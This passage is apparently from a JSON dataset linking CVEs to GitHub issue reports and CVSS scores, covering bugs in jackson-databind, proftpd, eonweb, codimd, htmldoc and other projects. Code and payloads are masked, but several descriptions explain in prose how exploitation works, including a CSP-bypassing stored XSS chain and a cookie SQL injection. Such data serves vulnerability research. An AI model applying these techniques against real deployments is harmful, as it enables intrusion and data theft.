  62655. "description": "Block one more gadget type (xbean reflect/JNDI CVE NUMBERTAG NOTE: a placeholder until complete information gathered] Another gadget ( ) type reported related to JNDI access. See URLTAG for description of the general problem. Mitre id: TO BE ALLOCATED Original discoverer: threedr3am Fixed in NUMBERTAG most likely) does not affect NUMBERTAG and later",
  62656. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62657. "severity": "CRITICAL",
  62658. "baseScore": 9.8,
  62659. "impactScore": 5.9,
  62660. "exploitabilityScore": 3.9
  62661. },
  62662. {
  62663. "CVE_ID": "CVE-2020-8908",
  62664. "Issue_Url_old": "https://github.com/google/guava/issues/4011",
  62665. "Issue_Url_new": "https://github.com/google/guava/issues/4011",
  62666. "Repo_new": "google/guava",
  62667. "Issue_Created_At": "2020-09-08T22:13:01Z",
  62668. "description": "APITAG local information disclosure vulnerability. Since the fix for this vulnerability is now disclosed by this commit ( URLTAG and it was closed internally by google as APITAG Functionality' I figure I'll disclose the vulnerability fully. Vulnerability CODETAG On the flip side, when using APITAG , this creates a directory with the correct file permissions. CODETAG Impact The impact of this vulnerability is that, the file permissions on the file created by APITAG allows an attacker running a malicious program co resident on the same machine can steal secrets stored in this directory. This is because by default on unix like operating systems the APITAG directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system. Resolution The resolution by the Google team was the following: > The team decided to document the behavior, as well as deprecate the method as other alternatives exist. This completely makes sense to me, and I think is appropriate. The open question that exists in my mind is whether or not this issue warrants a CVE number issued.",
  62669. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  62670. "severity": "LOW",
  62671. "baseScore": 3.3,
  62672. "impactScore": 1.4,
  62673. "exploitabilityScore": 1.8
  62674. },
  62675. {
  62676. "CVE_ID": "CVE-2020-8927",
  62677. "Issue_Url_old": "https://github.com/bitemyapp/brotli2-rs/issues/45",
  62678. "Issue_Url_new": "https://github.com/bitemyapp/brotli2-rs/issues/45",
  62679. "Repo_new": "bitemyapp/brotli2-rs",
  62680. "Issue_Created_At": "2021-12-20T21:10:45Z",
  62681. "description": "Packaged version of brotli is affected by CVETAG . Brotli versions prior NUMBERTAG are affected by CVETAG . URLTAG This is an integer overflow and I believe it is reachable from the rust bindings, but that's just based on a quick perusal of the source code.",
  62682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
  62683. "severity": "MEDIUM",
  62684. "baseScore": 6.5,
  62685. "impactScore": 2.5,
  62686. "exploitabilityScore": 3.9
  62687. },
  62688. {
  62689. "CVE_ID": "CVE-2020-8927",
  62690. "Issue_Url_old": "https://github.com/github/advisory-database/issues/785",
  62691. "Issue_Url_new": "https://github.com/github/advisory-database/issues/785",
  62692. "Repo_new": "github/advisory-database",
  62693. "Issue_Created_At": "2022-10-31T20:04:11Z",
  62694. "description": "Update impacted packages for CVETAG . Hi, This list of impacted packages is based on input from the .NET team. //cc MENTIONTAG MENTIONTAG MENTIONTAG , I would have used the Advisory update UX to update URLTAG but this list is just so long \ud83d\ude06 CVE | Announcement date | CVE URL | Announcement URL | APITAG Advisory | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | CVETAG | PATHTAG | URLTAG | URLTAG | URLTAG | APITAG arm | APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG",
  62695. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
  62696. "severity": "MEDIUM",
  62697. "baseScore": 6.5,
  62698. "impactScore": 2.5,
  62699. "exploitabilityScore": 3.9
  62700. },
  62701. {
  62702. "CVE_ID": "CVE-2020-8981",
  62703. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/338",
  62704. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/338",
  62705. "Repo_new": "mantisbt-plugins/source-integration",
  62706. "Issue_Created_At": "2020-02-13T13:33:38Z",
  62707. "description": "XSS in Delete Repository page. This is related to NUMBERTAG Steps to reproduce NUMBERTAG Create a new repository, set repo name to APITAG NUMBERTAG Update and go back to Manage Repository page NUMBERTAG Click on APITAG Repository_ CVE request pending.",
  62708. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62709. "severity": "MEDIUM",
  62710. "baseScore": 6.1,
  62711. "impactScore": 2.7,
  62712. "exploitabilityScore": 2.8
  62713. },
  62714. {
  62715. "CVE_ID": "CVE-2020-9272",
  62716. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/902",
  62717. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/902",
  62718. "Repo_new": "proftpd/proftpd",
  62719. "Issue_Created_At": "2020-02-18T17:15:00Z",
  62720. "description": "Out of bound read in getstateflags function. This vulnerability was previously reported via email to EMAILTAG rg and has been made public after the fix has been developed. Credit This issue was discovered and reported by APITAG Security Lab team member MENTIONTAG APITAG Morales). Summary: An out of bounds (OOB) read vulnerability has been detected in mod_cap. Description: The APITAG function on \"cap_text.c\" does a call to getstateflags(caps, n) [line NUMBERTAG When getstateflags(cap_t caps, int capno) is called, \"capno\" is equal to NUMBERTAG so \"isset_cap((__cap_s )(&caps APITAG will be expanded to \"&((__cap_s )(&caps APITAG >_blk NUMBERTAG accesing caps APITAG that is outside of \"caps\" struct bounds NUMBERTAG ae4 to NUMBERTAG af7 in our example) APITAG As a result, OOB reads occurs resulting in accessing a memory location that is outside of the boundaries of the caps struct variable. This bug doesn't affect neither APITAG nor APITAG This is because in these cases \"permited\" and \"inheritable\" members are located just after them APITAG Please let me know when you have fixed the bugs so that I can coordinate my disclosure with yours. For reference, here is a link to APITAG vulnerability disclosure policy: URLTAG Thank you, Antonio Morales APITAG Security Lab Team",
  62721. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  62722. "severity": "HIGH",
  62723. "baseScore": 7.5,
  62724. "impactScore": 3.6,
  62725. "exploitabilityScore": 3.9
  62726. },
  62727. {
  62728. "CVE_ID": "CVE-2020-9273",
  62729. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/903",
  62730. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/903",
  62731. "Repo_new": "proftpd/proftpd",
  62732. "Issue_Created_At": "2020-02-18T17:27:21Z",
  62733. "description": "Use after free vulnerability in memory pool allocator. This vulnerability was previously reported via email to EMAILTAG rg and has been made public after the fix has been developed. Credit This issue was discovered and reported by APITAG Security Lab team member MENTIONTAG APITAG Morales). Summary A use after free vulnerability exists in APITAG Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system. Product APITAG Tested Version APITAG (development version) Details Use after free vulnerability in memory pool allocator It is possible to corrupt the APITAG memory pool by interrupting current data transfer APITAG Exploit Demo APITAG In our APITAG the program crashes on \"alloc_pool\" function (pool.c). This function executes the instruction first_avail = blok >h.first_avail. As you can see, the right side operand of the assignment in APITAG is p >last APITAG However, the problem is that \"p\" is a corrupted pool APITAG The source of the problem comes from pcalloc call in APITAG APITAG This function calls again to the \"alloc_pool\" function which calls to \"new_block\" to obtain a new freed memory block APITAG But the memory block returned by \"new_block\" is referenced by the \"p\" pool. So, in short, \"p\" is a dangling pointer due to an use after free vulnerability. It's important to note that our tests have shown that this vulnerability can also lead to other vulnerabilities (such as OOB write), so it increases the severity of the vulnerability. Impact This issue may lead to Post Auth RCE (maybe FTP anonymous users are also affected). Disclosure Policy This report is subject to a NUMBERTAG day coordinated disclosure policy. The disclosure deadline for the findings outlined in this report is NUMBERTAG",
  62734. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62735. "severity": "HIGH",
  62736. "baseScore": 8.8,
  62737. "impactScore": 5.9,
  62738. "exploitabilityScore": 2.8
  62739. },
  62740. {
  62741. "CVE_ID": "CVE-2020-9329",
  62742. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5926",
  62743. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5926",
  62744. "Repo_new": "gogs/gogs",
  62745. "Issue_Created_At": "2020-02-19T18:09:37Z",
  62746. "description": "Race condition can make APITAG useless. Description Users could potentially create more repos than specified in APITAG as APITAG field is not updated in a race condition safe cavalier (i.e. row is not locked). Such logic error could be fatal in some specific settings. Reason PATHTAG ERRORTAG APITAG Execute following script in the console of the user: CODETAG The resultant APITAG is less than NUMBERTAG it is NUMBERTAG in my settings) though NUMBERTAG repos are created. Solution Indeed, some other fields also need locking but are not that crucial to the integrity of the system. CODETAG Or stop using fields in user table to save the value as it could be counted directly by using repository table.",
  62747. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  62748. "severity": "MEDIUM",
  62749. "baseScore": 5.9,
  62750. "impactScore": 3.6,
  62751. "exploitabilityScore": 2.2
  62752. },
  62753. {
  62754. "CVE_ID": "CVE-2020-9369",
  62755. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/886",
  62756. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/886",
  62757. "Repo_new": "sympa-community/sympa",
  62758. "Issue_Created_At": "2020-02-24T04:26:11Z",
  62759. "description": "FILETAG (published later). Pull request has been prepared and will be submitted soon.",
  62760. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62761. "severity": "HIGH",
  62762. "baseScore": 7.5,
  62763. "impactScore": 3.6,
  62764. "exploitabilityScore": 3.9
  62765. },
  62766. {
  62767. "CVE_ID": "CVE-2020-9447",
  62768. "Issue_Url_old": "https://github.com/manolo/gwtupload/issues/32",
  62769. "Issue_Url_new": "https://github.com/manolo/gwtupload/issues/32",
  62770. "Repo_new": "manolo/gwtupload",
  62771. "Issue_Created_At": "2020-02-12T17:14:35Z",
  62772. "description": "XSS in the file upload functionality. There is an APITAG site scripting) present in the file upload functionality, where someone can upload a file with malicious filename, which contains APITAG code, which would results in XSS. Example: FILETAG FILETAG How to reproduce NUMBERTAG Deploy APITAG war file ( FILETAG NUMBERTAG Upload a file from a Linux system(due to Windows filename character restrictions), which contains APITAG code. For example: a APITAG",
  62773. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62774. "severity": "MEDIUM",
  62775. "baseScore": 6.1,
  62776. "impactScore": 2.7,
  62777. "exploitabilityScore": 2.8
  62778. },
  62779. {
  62780. "CVE_ID": "CVE-2020-9465",
  62781. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/51",
  62782. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/51",
  62783. "Repo_new": "eyesofnetworkcommunity/eonweb",
  62784. "Issue_Created_At": "2020-02-26T17:32:06Z",
  62785. "description": "Injection SQL sur le cookie user_id. Bonjour, Il est possible de r\u00e9aliser une injection SQL sur le cookie APITAG . Il a \u00e9t\u00e9 observ\u00e9 que cette injection est possible sur les pages APITAG , APITAG et APITAG sans authentification pr\u00e9alable. Exemple d'injection de code utilisant la fonction sleep NUMBERTAG ERRORTAG L'exploitation d'une telle injection SQL peut permettre \u00e0 un attaquant d'obtenir des acc\u00e8s administrateurs sur l'application (r\u00e9cup\u00e9ration de session_id admin, dump de table users). Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG et NUMBERTAG t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel (la NUMBERTAG doit probablement aussi \u00eatre vuln\u00e9rable). Le fichier source permettant l\u2019injection SQL est APITAG au morceau de code suivant : CODETAG",
  62786. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62787. "severity": "CRITICAL",
  62788. "baseScore": 9.8,
  62789. "impactScore": 5.9,
  62790. "exploitabilityScore": 3.9
  62791. },
  62792. {
  62793. "CVE_ID": "CVE-2020-9467",
  62794. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1168",
  62795. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1168",
  62796. "Repo_new": "piwigo/piwigo",
  62797. "Issue_Created_At": "2020-03-24T13:03:01Z",
  62798. "description": "stored XSS with APITAG",
  62799. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  62800. "severity": "MEDIUM",
  62801. "baseScore": 5.4,
  62802. "impactScore": 2.7,
  62803. "exploitabilityScore": 2.3
  62804. },
  62805. {
  62806. "CVE_ID": "CVE-2020-9468",
  62807. "Issue_Url_old": "https://github.com/plegall/Piwigo-community/issues/49",
  62808. "Issue_Url_new": "https://github.com/plegall/piwigo-community/issues/49",
  62809. "Repo_new": "plegall/piwigo-community",
  62810. "Issue_Created_At": "2020-03-24T13:19:57Z",
  62811. "description": "[security] ability to by pass protection on photo edition. CVETAG reported by Zak S. > Further, a malicious user can modify the value of the 'image_id' parameter to any existing image id. There are no access controls to prevent a user from manipulating information on images that are in albums to which they do not have access.",
  62812. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  62813. "severity": "MEDIUM",
  62814. "baseScore": 4.3,
  62815. "impactScore": 1.4,
  62816. "exploitabilityScore": 2.8
  62817. },
  62818. {
  62819. "CVE_ID": "CVE-2020-9546",
  62820. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2631",
  62821. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2631",
  62822. "Repo_new": "fasterxml/jackson-databind",
  62823. "Issue_Created_At": "2020-02-27T21:17:02Z",
  62824. "description": "Block one more gadget type (shaded hikari config, CVE to be allocated) . (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: [TO BE ALLOCATED] Reporters: threedr3am & LFY Fix will be included in:",
  62825. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62826. "severity": "CRITICAL",
  62827. "baseScore": 9.8,
  62828. "impactScore": 5.9,
  62829. "exploitabilityScore": 3.9
  62830. },
  62831. {
  62832. "CVE_ID": "CVE-2020-9547",
  62833. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2634",
  62834. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2634",
  62835. "Repo_new": "fasterxml/jackson-databind",
  62836. "Issue_Created_At": "2020-03-01T01:02:31Z",
  62837. "description": "Block two more gadget types (ibatis sqlmap, anteros core; CVE to be allocated). note: placeholder until verified/validated, fix provided) Another NUMBERTAG gadget type reported regarding a classes of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: [TO BE ALLOCATED] Reporters: threedr3am & APITAG Fix will be included in:",
  62838. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62839. "severity": "CRITICAL",
  62840. "baseScore": 9.8,
  62841. "impactScore": 5.9,
  62842. "exploitabilityScore": 3.9
  62843. },
  62844. {
  62845. "CVE_ID": "CVE-2020-9549",
  62846. "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/8",
  62847. "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/8",
  62848. "Repo_new": "enferex/pdfresurrect",
  62849. "Issue_Created_At": "2020-02-28T18:57:24Z",
  62850. "description": "Bug: Buffer Overflow into Out of Bounds Write. Description In NUMBERTAG and newer, the function APITAG in APITAG has the following logic: URLTAG If buf does not contain one of the expected terminating characters (whitespace, APITAG , APITAG ), c can point to an address outside buf , causing a APITAG byte to be written out of bounds. Example Instead of creating a APITAG I found a benign PDF that happens to trigger this bug: FILETAG (sha NUMBERTAG APITAG ) The problem occurs while parsing the following data: CODETAG Due to the reuse of buf between invocations of the function, buf will eventually contain: APITAG This benign example causes a read to segfault, but a more carefully crafted input could cause an out of bounds write. Valgrind ERRORTAG",
  62851. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  62852. "severity": "HIGH",
  62853. "baseScore": 7.8,
  62854. "impactScore": 5.9,
  62855. "exploitabilityScore": 1.8
  62856. },
  62857. {
  62858. "CVE_ID": "CVE-2021-20066",
  62859. "Issue_Url_old": "https://github.com/jsdom/jsdom/issues/3124",
  62860. "Issue_Url_new": "https://github.com/jsdom/jsdom/issues/3124",
  62861. "Repo_new": "jsdom/jsdom",
  62862. "Issue_Created_At": "2021-02-22T09:43:06Z",
  62863. "description": "CVETAG ] : APITAG improperly allows the loading of local resources. Basic info: FILETAG version NUMBERTAG jsdom version NUMBERTAG Minimal reproduction case From URLTAG _([ CVETAG CVETAG _ : > Synopsis > > APITAG improperly allows the loading of local resources. Modern browser best practices dictate that the loading of local resources should be disallowed by default. > > From documentation, APITAG does not, by default, load any subresources. Users must enable the loading of resources/subresources. For example, when creating a new JSDOM object, the resources item can be set to \"usable\" to allow the loading of external resources: APITAG > The issue here is that this setting also enables the loading of local resources. For example, the following code snippet verifies that JSDOM is attempting to access a local resource by using a non existent file to throw an error: CODETAG > Output when running the above: ERRORTAG",
  62864. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
  62865. "severity": "MEDIUM",
  62866. "baseScore": 5.6,
  62867. "impactScore": 3.4,
  62868. "exploitabilityScore": 2.2
  62869. },
  62870. {
  62871. "CVE_ID": "CVE-2021-20190",
  62872. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2854",
  62873. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2854",
  62874. "Repo_new": "fasterxml/jackson-databind",
  62875. "Issue_Created_At": "2020-09-16T15:32:43Z",
  62876. "description": "Block one more gadget type APITAG Another gadget type(s) has been reported but not yet verified regarding a class(es) of JDK Swing. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): Yangkun(ICSL) Fix (if one needed) would be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  62877. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62878. "severity": "HIGH",
  62879. "baseScore": 8.1,
  62880. "impactScore": 5.9,
  62881. "exploitabilityScore": 2.2
  62882. },
  62883. {
  62884. "CVE_ID": "CVE-2021-20218",
  62885. "Issue_Url_old": "https://github.com/fabric8io/kubernetes-client/issues/2715",
  62886. "Issue_Url_new": "https://github.com/fabric8io/kubernetes-client/issues/2715",
  62887. "Repo_new": "fabric8io/kubernetes-client",
  62888. "Issue_Created_At": "2021-01-12T04:35:34Z",
  62889. "description": "Potential CVE?. A recently found vulnerability URLTAG was fixed in another project URLTAG similar to this one. It might potentially affect a similar implementation URLTAG in APITAG . Ironically, it prints out the normalized path URLTAG into stdout, but uses the original (potentially dangerous) path.",
  62890. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62891. "severity": "HIGH",
  62892. "baseScore": 7.4,
  62893. "impactScore": 5.2,
  62894. "exploitabilityScore": 2.2
  62895. },
  62896. {
  62897. "CVE_ID": "CVE-2021-20245",
  62898. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/3176",
  62899. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/3176",
  62900. "Repo_new": "imagemagick/imagemagick",
  62901. "Issue_Created_At": "2021-02-02T06:03:44Z",
  62902. "description": "Division by zero in APITAG in coders/webp.c . When APITAG was set to zero, a division by zero error would happen in line NUMBERTAG So a crafted file may trigger undefined behavior in the form of division by zero. Maybe there need a APITAG to do division in line NUMBERTAG URLTAG",
  62903. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  62904. "severity": "MEDIUM",
  62905. "baseScore": 5.5,
  62906. "impactScore": 3.6,
  62907. "exploitabilityScore": 1.8
  62908. },
  62909. {
  62910. "CVE_ID": "CVE-2021-20285",
  62911. "Issue_Url_old": "https://github.com/upx/upx/issues/421",
  62912. "Issue_Url_new": "https://github.com/upx/upx/issues/421",
  62913. "Repo_new": "upx/upx",
  62914. "Issue_Created_At": "2020-11-12T12:39:35Z",
  62915. "description": "APITAG APITAG APITAG What's the problem (or question)? An issue was discovered in up NUMBERTAG devel branch), There is an illegal memory access in function APITAG at APITAG I also check the newest release version meet the same crash, lies at APITAG What should have happened? no illegal memory access (crash) Do you have an idea for a solution? check the relocation_offset and do not access the illegal memory How can we reproduce the issue NUMBERTAG Compile the devel branch with sanitize open APITAG NUMBERTAG Use APITAG and get crash download the poc URLTAG here. source ERRORTAG the source code didn't check the rel_off so get an illegal rp debug FILETAG bug report ERRORTAG Please tell us details about your environment. UPX version used (both APITAG and APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG H CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG H CPU NUMBERTAG GHz",
  62916. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
  62917. "severity": "MEDIUM",
  62918. "baseScore": 6.6,
  62919. "impactScore": 4.7,
  62920. "exploitabilityScore": 1.8
  62921. },
  62922. {
  62923. "CVE_ID": "CVE-2021-20308",
  62924. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/423",
  62925. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/423",
  62926. "Repo_new": "michaelrsweet/htmldoc",
  62927. "Issue_Created_At": "2021-03-21T13:11:39Z",
  62928. "description": "Bug: buffer overflow caused by integer overflow in APITAG Hi, I found some integer overflow vulnerability that is similar to CVETAG URLTAG in htmldoc. os : Debian APITAG bullseye/sid version NUMBERTAG FILETAG In htmldoc poc, there are maliciously crafted gif and html file which crashes htmldoc like below. APITAG The vulnerability resides in APITAG function in htmldoc/image.cxx file. In line NUMBERTAG the program reads data from given gif file using fread NUMBERTAG fread(buf NUMBERTAG fp); Then, it stores value to 'img >width' and 'img >height' in line NUMBERTAG and 'img >depth' is determined by whether given image is grayscale NUMBERTAG img >width = (buf NUMBERTAG APITAG height = (buf NUMBERTAG APITAG depth = gray NUMBERTAG If load_data is equal to NUMBERTAG and, 'img >width' and 'img >height' are enough large to cause an integer overflow, the small heap block is allocated in line NUMBERTAG It leads to buffer overrun when reads data to this buffer in APITAG NUMBERTAG if (!load_data NUMBERTAG return NUMBERTAG img >pixels = (uchar )malloc((size_t)(img >width img >height img >depth));",
  62929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62930. "severity": "CRITICAL",
  62931. "baseScore": 9.8,
  62932. "impactScore": 5.9,
  62933. "exploitabilityScore": 3.9
  62934. },
  62935. {
  62936. "CVE_ID": "CVE-2021-21259",
  62937. "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1648",
  62938. "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1648",
  62939. "Repo_new": "hackmdio/codimd",
  62940. "Issue_Created_At": "2021-01-13T11:01:12Z",
  62941. "description": "Stored XSS in slide mode (via reveal markdown). There is a (quite convoluted) stored XSS vulnerability in the slides feature: The presentation's YAML options allow specifying APITAG files as dependencies. Any JS file specified by the dependency option is loaded and executed (when viewed via the presentation mode, APITAG ), subject to the server's CSP and their Content Type header We can use JSONP endpoints that bypass the CSP (e.g. on Vimeo or Slideshare, or on Disqus with a free API key) to run arbitrary existing JS functions _without arguments_ We use APITAG followed by APITAG to inject HTML from a div element with a APITAG attribute in the speaker notes into the DOM. The slide navigation is necessary to ensure that the speaker notes are outside of the DOM of the original slide before the second request comes in (duplicate calls to APITAG break the proof of concept). Usually, the included markdown would be enclosed in a APITAG tag to ensure that nothing can escape into the DOM. However, APITAG does not properly escape APITAG tags (the check is case sensitive, but should at the very least be case insensitive): CODETAG Actual JS in this DOM injection will never be loaded, because it is assigned via APITAG , but because the CSP includes so many different embed features, we can load FILETAG from Disqus (it is used on the Disqus login page, fairly easy to find) that walks the entire DOM and renders APITAG template strings. From the template, we can simply grab another script from anywhere (including another note) and eval it. A full proof of concept implementation can be found here URLTAG : The main note ( APITAG ) is responsible for loading the templating JS (and the old APITAG version that it requires) from Disqus, and issuing the two JSONP calls that lead to the DOM injection The APITAG note contains the content that is injected into the DOM, and loads and executes the final payload The APITAG script is the final XSS payload (here, because this was for hxp NUMBERTAG CTF's hackme challenge URLTAG it simply grabs the contents of the APITAG page and sends it to the attacker, but you can just as easily run any other APITAG code). The APITAG script automates the upload process and automatically reports the XSS page (the slides of APITAG in presentation mode) to the challenge admin, which isn't really relevant here. The most straightforward way to mitigate this is to fix the DOM injection in APITAG by modifying the check for APITAG to cover everything that browsers use to end a APITAG tag. I also wonder what value the dependency YAML option really brings to the slides feature it is restricted to loading JS from pages listed in the CSP anyways, so it would probably be better to just load scripts related to e.g. video embeds as needed (just as in \"normal\" markdown mode), and discard the option otherwise. Note that while the CTF challenge was using a (slightly modified, to fix some but given some of the solutions, apparently not all dependencies with known CVEs) APITAG NUMBERTAG this exploit still works against the official NUMBERTAG release, and FILETAG ( source URLTAG .",
  62942. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62943. "severity": "MEDIUM",
  62944. "baseScore": 6.1,
  62945. "impactScore": 2.7,
  62946. "exploitabilityScore": 2.8
  62947. },
  62948. {
  62949. "CVE_ID": "CVE-2021-21306",
  62950. "Issue_Url_old": "https://github.com/markedjs/marked/issues/1927",
  62951. "Issue_Url_new": "https://github.com/markedjs/marked/issues/1927",
  62952. "Repo_new": "markedjs/marked",
  62953. "Issue_Created_At": "2021-02-05T01:36:23Z",
